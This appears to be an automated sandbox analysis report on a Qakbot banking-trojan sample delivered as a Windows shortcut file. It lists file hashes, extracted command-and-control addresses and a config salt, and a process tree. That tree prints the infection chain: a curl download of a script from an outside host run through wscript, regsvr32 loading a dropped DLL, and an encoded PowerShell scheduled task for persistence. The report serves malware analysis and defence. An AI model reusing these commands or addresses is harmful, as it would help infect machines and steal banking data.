Overview

overview

10

Static

static

doc/Valid155.lnk

windows7-x64

3

doc/Valid155.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-09-2022 18:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    doc/Valid155.lnk

  • Size

    2KB

  • MD5

    41c12342c2571e0030be5e2d167a836e

  • SHA1

    a54d3181fddc3ab15cb482865a255a74052c4e56

  • SHA256

    2b692ca392558fca23f219383cc7c23c4b3dca641a3e49c9b48f096df091273e

  • SHA512

    4aeb1575dd294455b9f585b618ce7d3526e771a5fc98ea22b3231c5cc253e9f3bd2e0adfc4aefe4f566d62955f2cfe565ea5099f19bea6b908490f2ec7d8a42e

Score
10/10
qakbotbb1662647912bankerstealertrojan

Malware Config

Extracted

Family

qakbot

Version

403.860

Botnet

BB

Campaign

1662647912

C2

197.94.210.133:443

193.3.19.37:443

70.51.153.182:2222

99.232.140.205:2222

123.240.131.1:443

177.102.84.28:32101

105.156.152.227:443

190.59.247.136:995

89.211.218.88:2222

81.214.220.237:443

85.99.62.74:443

191.97.234.238:995

81.131.161.131:2078

217.165.68.122:993

219.69.103.199:443

37.210.148.30:995

64.207.215.69:443

113.169.57.104:443

179.225.221.169:32101

151.234.99.49:990
Attributes
  • salt

    SoNuce]ugdiB3c[doMuce2s81*uXmcvP

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

    trojanbankerstealerqakbot
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 51 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\doc\Valid155.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /c echo 'HI_U' && MD "C:\Users\Admin\AppData\Local\ur\B4O" && curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html && cd "C:\Users\Admin\AppData\Local\ur\B4O" && wscript enhrP.s_1L.QH0w.js && echo "Nj"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\system32\curl.exe
        curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html
        3⤵
          PID:1420
        • C:\Windows\system32\wscript.exe
          wscript enhrP.s_1L.QH0w.js
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4320
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping go.com && regsvr32 _WUF.dll
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2508
            • C:\Windows\system32\PING.EXE
              ping go.com
              5⤵
              • Runs ping.exe
              PID:4356
            • C:\Windows\system32\regsvr32.exe
              regsvr32 _WUF.dll
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4256
              • C:\Windows\SysWOW64\regsvr32.exe
                _WUF.dll
                6⤵
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:3416
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:1780
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /Z /ST 21:00 /tn vepennhq /ET 21:11 /tr "powershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHIAXABCADQATwBcAF8AVwBVAEYALgBkAGwAbAAiAA==" /SC ONCE
                    8⤵
                    • Creates scheduled task(s)
                    PID:4392
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHIAXABCADQATwBcAF8AVwBVAEYALgBkAGwAbAAiAA==
      1⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Windows\system32\regsvr32.exe
        "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3544
        • C:\Windows\SysWOW64\regsvr32.exe
          C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll
          3⤵
          • Loads dropped DLL
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:3916
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            4⤵
            • Modifies data under HKEY_USERS
            PID:1016

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Remote System Discovery

    1
    T1018

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll
      Filesize

      548KB

      MD5

      640c452ee47770d7d77a0c0ae1a8c4bb

      SHA1

      e095fedc8f40d5b76e76adbc7cce1e22720b14ba

      SHA256

      1b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290

      SHA512

      f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a

      Download Submit
    • C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js
      Filesize

      132KB

      MD5

      253ad74e5aa214a0bf29e646c4b3879f

      SHA1

      8ab4bb418dbe65a02ecf0d0fd5c4f0dff4d3a603

      SHA256

      bf1cfd9542d706afd19954100f90b3b2558c6ec5b885b2cbd8dc451ebd860630

      SHA512

      16dbc08740d0ead7159d8e528df902eb962ea4a4f785566aba2f9ceacb85eb755da258f577ab8063448796e8628a5e7b91006f0b17c47b13071f2647b1cc620c

      Download Submit
    • memory/1016-162-0x0000000000EA0000-0x0000000000EC2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1016-161-0x0000000000EA0000-0x0000000000EC2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1016-159-0x0000000000000000-mapping.dmp
      Download
    • memory/1420-133-0x0000000000000000-mapping.dmp
      Download
    • memory/1780-148-0x0000000000D70000-0x0000000000D92000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1780-150-0x0000000000D70000-0x0000000000D92000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1780-146-0x0000000000000000-mapping.dmp
      Download
    • memory/2180-151-0x00000182C7B50000-0x00000182C7B72000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2180-156-0x00007FFE34AB0000-0x00007FFE35571000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2188-132-0x0000000000000000-mapping.dmp
      Download
    • memory/2508-136-0x0000000000000000-mapping.dmp
      Download
    • memory/3416-140-0x0000000000000000-mapping.dmp
      Download
    • memory/3416-147-0x0000000000ED0000-0x0000000000EF2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3416-145-0x0000000000ED0000-0x0000000000EF2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3416-144-0x0000000000EA0000-0x0000000000EC4000-memory.dmp
      Filesize

      144KB

      Download
    • memory/3416-143-0x0000000000950000-0x00000000009D6000-memory.dmp
      Filesize

      536KB

      Download
    • memory/3544-152-0x0000000000000000-mapping.dmp
      Download
    • memory/3916-154-0x0000000000000000-mapping.dmp
      Download
    • memory/3916-157-0x0000000003BA0000-0x0000000003BC4000-memory.dmp
      Filesize

      144KB

      Download
    • memory/3916-158-0x0000000003BF0000-0x0000000003C12000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3916-160-0x0000000003BF0000-0x0000000003C12000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4256-138-0x0000000000000000-mapping.dmp
      Download
    • memory/4320-134-0x0000000000000000-mapping.dmp
      Download
    • memory/4356-137-0x0000000000000000-mapping.dmp
      Download
    • memory/4392-149-0x0000000000000000-mapping.dmp
      Download